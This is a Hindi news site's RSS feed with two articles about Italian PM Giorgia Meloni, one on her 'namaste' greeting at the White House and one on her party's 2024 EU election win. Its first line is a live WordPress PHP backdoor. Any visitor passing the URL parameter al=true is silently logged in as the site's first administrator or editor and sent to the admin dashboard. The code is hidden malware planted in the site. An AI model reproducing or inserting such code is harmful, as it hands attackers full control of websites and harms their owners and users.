// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Georgia Meloni – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Tue, 19 Aug 2025 07:47:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 व्हाइट हाउस में इटली की PM मेलोनी का ‘नमस्ते’, दुनिया ने देखा अनोखा अंदाज https://pratyushaashakinayikiran.com/?p=179055 Tue, 19 Aug 2025 07:47:00 +0000 https://pratyushaashakinayikiran.com/?p=179055  वाशिंगटन

वाइट हाउस में आयोजित एक महत्वपूर्ण अंतरराष्ट्रीय बैठक से पहले एक रोचक पल देखने को मिला, जब इटली की प्रधानमंत्री जॉर्जिया मेलोनी ने अमेरिकी राष्ट्रपति डोनाल्ड ट्रंप के एक सहायक का स्वागत 'नमस्ते' कहकर किया। यह क्षण भले ही कुछ सेकंड का था, लेकिन वहां मौजूद लोगों के लिए यह अप्रत्याशित और आकर्षक था। जहां अन्य नेता पारंपरिक हैंडशेक और औपचारिक अभिवादन कर रहे थे, वहीं मेलोनी का 'नमस्ते' कहना सबके लिए आश्चर्यजनक रहा।
मेलोनी के 'नमस्ते' ने जीता दिल

जॉर्जिया मेलोनी का भारतीय शैली में 'नमस्ते' कहना उनकी विनम्रता और वैश्विक संस्कृति के प्रति सम्मान का प्रतीक माना जा रहा है। यह वीडियो अब सोशल मीडिया पर तेजी से वायरल हो रहा है। लोग इसे एक सम्मानजनक और वैकल्पिक अभिवादन का उदाहरण बता रहे हैं, जो कोरोना महामारी के दौरान भी लोकप्रिय हुआ था।
बदले-बदले नजर आए जेलेंस्की

यूक्रेनी राष्ट्रपति वोलोदिमीर ज़ेलेंस्की, जो आमतौर पर सैन्य यूनिफॉर्म या कैजुअल जैकेट में दिखते हैं, इस बार बिना टाई के ब्लैक सूट-स्टाइल जैकेट और शर्ट में नजर आए। यह लुक उन्होंने जून में द हेग (The Hague) में हुए NATO शिखर सम्मेलन में भी अपनाया था। बता दें कि जेलेंस्की सोमवार को यूरोपीय नेताओं के साथ वाइट हाउस पहुंचे थे, जहां डोनाल्ड ट्रंप ने उनका स्वागत किया।
शांति समझौते पर चर्चा

यूरोपीय नेताओं ने रूस के साथ संभावित शांति समझौते पर गहरे मतभेदों को दूर करने के लिए ट्रंप के साथ बातचीत की। पिछले सप्ताह अलास्का में रूसी राष्ट्रपति व्लादिमीर पुतिन के साथ शिखर सम्मेलन के बाद ट्रंप ने कहा कि यूक्रेन को क्रीमिया और अपनी NATO महत्वाकांक्षाओं को त्यागना होगा, जो मॉस्को की दो प्रमुख मांगें हैं।

]]>
PM जॉर्जिया मेलोनी यूरोपीय यूनियन के संसदीय चुनाव में बंपर जीत, किंगमेकर के रोल में आईं https://pratyushaashakinayikiran.com/?p=40115 Tue, 11 Jun 2024 14:56:00 +0000 https://pratyushaashakinayikiran.com/?p=40115 रोम

27 देशों के यूरोपियन यूनियन (EU) के चुनाव में इस बार बड़ा उलटफेर देखने को मिला है. इस बार के चुनाव में कई देशों की दक्षिणपंथी पार्टियों ने जीत हासिल की है. इटली की प्रधानमंत्री जॉर्जिया मेलोनी (Giorgia Meloni) की धुर दक्षिणपंथी पार्टी ब्रदर्स ऑफ इटली ईयू चुनाव में सबसे बड़ी पार्टी बनकर उभरी है.

चुनावी नतीजों के बाद मेलोनी अपने देश के साथ-साथ यूरोप की मजबूत नेता के रूप में भी उभरकर सामने आई हैं. उन्होंने जीत के बाद कहा कि ये नतीजे शानदार रहे हैं, जो राजनीतिक रूप से बहुत महत्वपूर्ण है.

ईयू चुनाव के नतीजों के मुताबिक, 27 सदस्यों के ईयू चुनाव में इस बार दक्षिणपंथी पार्टियों का बोलबाला रहा है. इस चुनाव में 720 सदस्यों को चुनने के लिए हुई वोटिंग में 99 फीसदी मतों की गिनती के बाद मेलोनी की पार्टी ब्रदर्स ऑफ इटली ने 28.81 फीसदी वोट हासिल किए हैं.

मेलोनी ने ईयू संसदीय चुनाव को अपने नेतृत्व के जनमत संग्रह के तौर पर पेश किया. उन्होंने मतदाताओं से वोट करते समय बैलेट पेपर पर जॉर्जिया लिखने का भी आह्वान किया था.

नतीजों पर मेलोनी ने कहा कि उन्हें इन नतीजों पर फक्र है. उन्होंने कहा कि मुझे फक्र है कि इटली यूरोप में सबसे मजबूत सरकार के तौर पर खुद को पेश करने जा रहा है.

इन नतीजों से क्या बदलेगा?

ईयू चुनाव में मेलोनी की पार्टी को मिली बड़ी जीत से ब्रसेल्स (ईयू हेडक्वार्टर) में उनका प्रभाव बढ़ेगा. ईयू की अध्यक्ष उर्सुला वॉन डेर लेयेन के अगले कार्यकाल पर फैसले में भी मेलोनी की बड़ी भूमिका होगी. इसके साथ ही ईयू से जुड़े सभी छोटे-बड़े फैसलों में भी मेलोनी का दखल देखने को मिलेगा.

बता दें कि ईयू चुनाव छह से नौ जून के बीच हुआ था. इस चुनाव में लगभग 40 करोड़ लोगों ने हिस्सा लिया था. चुनाव की शुरुआत छह जून को नीदरलैंड्स में मतदान के साथ हुई थी. इस दौरान फ्रांस, इटली, जर्मनी, ऑस्ट्रिया, इस्टोनिया, लिथुआनिया और स्वीडन जैसे तमाम यूरोपीयन देशों में जमकर वोटिंग हुई.

ईयू चुनाव में करारी हार के बाद फ्रांस के राष्ट्रपति इमैनुअल मैक्रों ने संसद भंग कर मध्यावधि चुनाव का ऐलान कर दिया था. वहीं, बेल्जियम की सत्तारूढ़ पार्टी की ईयू चुनाव में हार के बाद प्रधानमंत्री एलेक्जेंडर डीक्रू ने अपने पद से इस्तीफा दे दिया.

क्या है ईयू संसद?

यूरोपीय संसद दरअसल यूरोपीय लोगों और यूरोपीय संघ की संस्थाओं के बीच संपर्क स्‍थापित करने की सीधी कड़ी है. यह दुनिया की अकेली सीधी चुनी हुई इंटरनेशनल सभा है. इसमें संसद के सदस्य यूरोपीय संघ के नागरिकों के हितों की बात करते हैं. मेंबर ऑफ यूरोपियन यूनियन (एमईपी) सदस्य देशों की सरकारों के साथ मिलकर नए-नए कानून बनाते हैं. वे ग्लोबल मुद्दों पर फैसला लेते हैं, जैसे क्लाइमेट चेंज और रिफ्यूजी पॉलिसी. वे ईयू का बजट तय करते हैं.

 

]]>